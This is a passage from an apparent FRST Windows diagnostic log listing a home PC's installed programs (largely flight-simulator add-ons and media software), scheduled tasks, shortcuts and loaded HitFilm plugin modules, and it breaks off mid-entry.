Hidden Just Flight - 757 Jetliner - American Airlines (New) Livery Pack (HKLM-x32\...\{17F122A7-2F9B-4794-91F8-DF0FB253E74F}) (Version: 1.00.000 - Just Flight) Just Flight - 757 Jetliner Freemium (HKLM-x32\...\{B0F7B3B5-E856-4558-BD7C-BDA32943C783}) (Version: 1.00.000 - Just Flight) LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - ) Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks) LiveWeb (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{F0A7B33E-C872-42C8-B1A9-55450809DAFF}) (Version: 4.00 - Shyam Pillai) Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) McAfee Virtual Technician (HKLM-x32\...\McAfee Virtual Technician) (Version: 7.6.0.202 - McAfee, Inc.) McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.279 - McAfee, Inc.) McDonnell Douglas DC-10 Version 2 FSX & P3D (HKLM\...\{0D9F34DB-535D-4FA2-B622-D03B6F479EBE}) (Version: 1 - Thomas Ruth and Erick Cantu, sounds by Dennis Vormberge) MergeModule_x86 (x32 Version: 9.3.00 - Sony Corporation) Hidden Microsoft Expression Encoder 4 (HKLM-x32\...\Encoder_4.0.1651.0) (Version: 4.0.1651.0 - Microsoft Corporation) Microsoft Expression Encoder 4 Screen Capture Codec (HKLM-x32\...\{952DCCD8-4039-46C8-BC8B-5C1EB6C8E130}) (Version: 4.0.1651.0 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation) Microsoft Flight Simulator X Service Pack 2 (HKLM-x32\...\{4847BBB9-EADD-4C92-90BF-4223B0892FF6}) (Version: 10.0.61472.0 - Microsoft Game Studios) Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation) Microsoft Office Home and Student 2016 - en-us (HKLM\...\HomeStudentRetail - en-us) (Version: 16.0.7369.2038 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) MidiEditor (HKLM-x32\...\D4338446-FFE6-1A12-ACFF-CB6F6A6A70A1) (Version: 3.0.0 - Markus Schwenk) Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.1.0 - Movavi) Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2 - Mozilla) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) MultitrackStudio Lite 8.1.3 (64-bit) (HKLM\...\MultitrackStudio64_is1) (Version: - Bremmers Audio Design) Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7369.2038 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7369.2038 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (Version: 16.0.7369.2038 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7369.2038 - Microsoft Corporation) Hidden Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - ) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) OpenShot Video Editor (HKLM-x32\...\{C55769E7-0B81-4E22-B5CE-805506E6B6B2}) (Version: 2.0.7 - OpenShot Studios, LLC) Oracle VM VirtualBox 5.1.6 (HKLM\...\{EEDDD7E2-A7A2-4FA9-8C32-ADB29A5096FF}) (Version: 5.1.6 - Oracle Corporation) paint.net (HKLM\...\{A1D05314-DC32-4668-A97E-51060EC8BCCE}) (Version: 4.0.12 - dotPDN LLC) PlayMemories Home (HKLM-x32\...\{94F4815B-755A-4FFA-AFDC-EE8FE776981E}) (Version: 4.3.00.04171 - Sony Corporation) PMB_ModeEditor (x32 Version: 9.3.00 - Sony Corporation) Hidden PMB_ServiceUploader (x32 Version: 9.3.00 - Sony Corporation) Hidden PMDG 737 8900 NGX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.00.2888 - PMDG Simulations, LLC.) PMDG 777-200LR/F Base Package FSX (HKLM-x32\...\{0F16340B-5B5B-4531-8D87-4952E3BCA6E6}) (Version: 1.10.6320 - PMDG Simulations, LLC.) PMDG 777-300ER Expansion (HKLM-x32\...\{E65EFDE6-0864-40BA-8DDF-E31F736D9000}) (Version: 1.10.6320 - PMDG Simulations, LLC.) POSKY Boeing 777-200 Pack FSX & P3D (HKLM\...\{684D778C-02D2-437D-AAEA-A2648B01AA93}) (Version: 1 - Project Open Sky) Prism Video File Converter (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Prism) (Version: 2.62 - NCH Software) PRO-ATC/X version 1.2.2.6 (HKLM-x32\...\PRO-ATC/X_is1) (Version: 1.2.2.6 - ) Product Improvement Study for HP ENVY 7640 series (HKLM\...\{9913BFAE-5E18-4863-8354-452337781573}) (Version: 34.2.117.50647 - Hewlett-Packard Co.) Python 3.5.1 (32-bit) (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{c39d559b-aa83-4476-ba20-988a35a1199a}) (Version: 3.5.1150.0 - Python Software Foundation) Python 3.5.1 Core Interpreter (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Development Libraries (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Documentation (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Executables (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Launcher (32-bit) (HKLM-x32\...\{17778F7B-FB5A-4A93-9719-D75BAF673498}) (Version: 3.5.150.0 - Python Software Foundation) Python 3.5.1 pip Bootstrap (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Standard Library (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Tcl/Tk Support (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Test Suite (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Utility Scripts (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project) QualityWings Ultimate 757 Collection FSX (HKLM-x32\...\QualityWings Ultimate 757 Collection FSX_is1) (Version: 1.3.2 - QualityWings) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.40 - Realtek Semiconductor Corp.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.24.1218.2013 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7548 - Realtek Semiconductor Corp.) Remote Desktop assistant (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\b948d155e8353e01) (Version: 1.0.0.102 - Remote Desktop assistant) S2 version 1.8 (HKLM-x32\...\3712C137-820D-48BE-83B2-DE57BC51343F_is1) (Version: 1.8 - Parallax, Inc.) Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.) SBACSecureBrowser (HKLM-x32\...\{157D208A-3283-46B2-B038-54F9BA4688E3}) (Version: 8.1.0 - AIR) ScriptVOX Studio (HKLM-x32\...\{57f97356-8f1d-45cf-a325-9de4c0896ced}) (Version: 2.0.19.17620 - Screaming Bee) ScriptVOX Studio (x32 Version: 2.0.19.17620 - Screaming Bee) Hidden SDU version 3.8 (HKLM-x32\...\{A23B547D-36B0-4B85-B68A-AADF6C9A723B}_is1) (Version: 3.8 - ) SketchUp 2016 (HKLM\...\{E2B66CF6-ABA0-4E5F-B426-7478B18301AE}) (Version: 16.1.1449 - Trimble Navigation Limited) SMART Common Files (HKLM-x32\...\{ED2455F7-6AA6-4D3C-85E9-A72297DD7051}) (Version: 11.0.246.0 - SMART Technologies ULC) SpellQuizzer 1.4.2 (HKLM-x32\...\SpellQuizzer_is1) (Version: - TedCo Software) Splashtop Software Updater (HKLM-x32\...\Splashtop Software Updater) (Version: 1.5.6.15 - Splashtop Inc.) Splashtop Streamer (HKLM-x32\...\{B7C5EA94-B96A-41F5-BE95-25D78B486678}) (Version: 3.1.0.0 - Splashtop Inc.) Spotify (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Spotify) (Version: 1.0.34.146.g28f9eda2 - Spotify AB) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.107 - Synaptics Incorporated) Synthesia (HKLM-x32\...\Synthesia) (Version: 10.2 - Synthesia LLC) SynthFont (HKLM-x32\...\SynthFont) (Version: - ) The Project SkyHigh MD-80 Base pack for FS2004 (HKLM-x32\...\The Project SkyHigh MD-80 Base pack for FS2004) (Version: - ) UK2000 Heathrow Free FSX (HKLM-x32\...\UK2000 Heathrow Free FSX) (Version: 3.0 - UK2000 Scenery) Unity Web Player (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS) Universal Extractor 1.6.1 (HKLM-x32\...\Universal Extractor_is1) (Version: 1.6.1 - Jared Breland) Verizon Internet Security Suite (HKLM-x32\...\MSC) (Version: 15.0.166 - McAfee, Inc.) Vz In-Home Agent (HKLM-x32\...\VzInHomeAgent) (Version: 9.0.76.0 - Verizon) VzDownloadManager (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\VzDownloadManager) (Version: 2.0.0.24 - Verizon) Windows 10 Upgrade Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17354 - Microsoft Corporation) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) Wirecast (HKLM\...\{13CCAC84-0C34-4D13-8C99-02D9F8B4C714}) (Version: 6.0.6 - Telestream LLC) Works Suite OS Pack (x32 Version: 1.0.0.0000 - Microsoft Corporation) Hidden Works Synchronization (x32 Version: 1.0.0.0000 - Your Company Name) Hidden XSplit Gamecaster (HKLM-x32\...\{D3C9DBAA-5395-4971-A962-553C7DBEA423}) (Version: 2.8.1605.2355 - SplitmediaLabs) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => <==== ATTENTION Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => <==== ATTENTION Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001Core.job => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001UA.job => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\HPCeeScheduleForbanie_000.job => Task: C:\WINDOWS\Tasks\HPCeeScheduleForKYLE-PC$.job => ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) Shortcut: C:\Users\Kyle Aniel\Favorites\NCH Software Download Site.lnk -> hxxp://www.nchsoftware.com/index.html Shortcut: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FS Recorder for FSX\Website.lnk -> hxxp://www.fs-recorder.net/ ShortcutWithArgument: C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_bkgoccjhfjgjedhkiefaclppgbmoobnk\Audiotool.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=bkgoccjhfjgjedhkiefaclppgbmoobnk ShortcutWithArgument: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Chrome Remote Desktop.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=gbchcmhmhahfdphkhkmpfmihenigjmpp ==================== Loaded Modules (Whitelisted) ============== 2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll 2016-09-17 05:57 - 2016-09-17 05:57 - 01864384 _____ () C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll 2016-03-14 14:55 - 2016-10-08 00:52 - 08923840 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll 2016-09-16 05:02 - 2016-09-16 05:02 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll 2016-10-13 15:27 - 2016-10-05 02:35 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-09-28 05:05 - 2016-09-28 05:05 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2016-09-28 05:05 - 2016-09-28 05:05 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2016-09-28 05:05 - 2016-09-28 05:05 - 35250688 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2016-06-07 16:07 - 2016-06-07 16:07 - 00308224 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\glew32.dll 2016-06-07 16:07 - 2016-06-07 16:07 - 00377344 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Half.dll 2016-06-07 16:07 - 2016-06-07 16:07 - 02626048 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\IlmImf.dll 2016-06-07 16:07 - 2016-06-07 16:07 - 00187904 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Iex.dll 2016-06-07 16:07 - 2016-06-07 16:07 - 00236544 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Imath.dll 2016-06-07 16:07 - 2016-06-07 16:07 - 02573824 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\opencv_core2410.dll 2016-06-07 16:07 - 2016-06-07 16:07 - 02236416 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\opencv_imgproc2410.dll 2016-06-07 16:07 - 2016-06-07 16:07 - 00135168 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\IlmThread.dll 2016-06-07 16:07 - 2016-06-07 16:07 - 00100864 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\zlibwapi.dll 2016-06-22 03:06 - 2016-06-22 03:06 - 00485016 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\4PointRamp.hfpl 2016-06-22 03:06 - 2016-06-22 03:06 - 00419480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AlphaBrightnessContrast.hfpl 2016-06-22 03:06 - 2016-06-22 03:06 - 00424088 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AngleBlur.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00528024 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AutoColor.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00525464 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AutoContrast.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00528024 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AutoLevels.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00935064 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AutoLightFlares.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00425112 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\BezierWarp.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00472728 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\BoxBlur.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00419480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\BrightnessContrast.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00481432 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Bulge.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00488088 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Cartoon.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00662680 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Caustics.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00477336 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ChromaBlur.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00485528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Chromenator.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00526488 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\CloneStamp.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00498840 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Clouds.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00424600 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ColorBalance.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00423064 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ColorDifferenceKey.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00422040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ColorTemperature.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 01478296 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\CreditsTextCrawl.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\CrushBlacksWhites.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\CrushBlacksWhitesAlpha.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00431768 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\DayForNight.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00597656 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Deinterlace.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Demult.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00611992 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Derez.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00521368 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\DifferenceKey.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00431256 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Diffuse.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00472728 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\DisplacementMap.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00481944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\DropShadow.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00439960 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Echo.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00422552 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Emboss.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00428184 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\EnvironmentMapTransform.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00490648 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\EnvironmentMapViewer.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00445080 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ErodeWhite.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00419992 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Fill.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00422040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FindEdges.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00473752 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FisheyeWarp.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00442520 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FisheyeWarp2.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00481432 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FlyEye.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00427672 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ForceMotionBlur.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00551576 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FractalNoise.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00425112 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FrameBlendedRetiming.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00420504 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FreezeFrame.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00419992 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Gamma.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00503448 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Glow.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00483480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\GlowDarks.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00438424 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Grain.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00479896 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Grid.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00486040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\HalfTone.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00477848 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Hotspots.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00435864 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\HSL.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00425112 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\HueColorize.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00427160 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\HueKey.hfpl 2016-06-22 03:07 - 2016-06-22 03:07 - 00424088 _____ () C:\Program Files\FXHOME\HitFilm 4 